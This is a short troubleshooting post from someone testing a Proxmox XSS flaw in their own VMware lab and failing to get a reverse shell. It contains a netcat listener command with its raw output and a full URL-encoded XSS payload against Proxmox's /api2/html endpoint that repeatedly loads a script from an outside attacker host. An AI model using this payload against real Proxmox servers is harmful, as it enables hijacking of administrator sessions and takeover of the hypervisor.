I can't get XSS to reverse shell

I am trying the security vulnerabilities found in proxmox on the proxmox that I installed on vmware. But I failed to get a reverse shell for XSS. I couldn't understand what caused the problem. Here he showed how to get a reverse shell from XSS but payload is not working for me. https://www.youtube.com/watch?v=ae-54FYt5t0 I'm listening with nc. root@ubuntu:~# nc -nvlp 1339 Listening on 0.0.0.0 1339 Connection received on 192.168.80.1 2897 �Ջ�F�����1xSy�l+IO"�+�/̨̩�,�0� � ����/5�� hhttp/1.1" �N�?!�Qޖ��8�,�tej_���yo#�(�]�zA!=�`���]ҟ��� @�^[[A^[[A#��|����8�\�����+ then i send payload as request. I can't get a reverse shell in the response. https://192.168.80.152:8006/api2/html/no%22%3E%3Csvg/onload=setInterval(function()%7Bwith(document)body.appendChild(createElement(%22script%22)).src=%22//192.168.80.151:1339%22%7D,100);%3E
http://dlvr.it/Sjd0Dc

No comments:

Post a Comment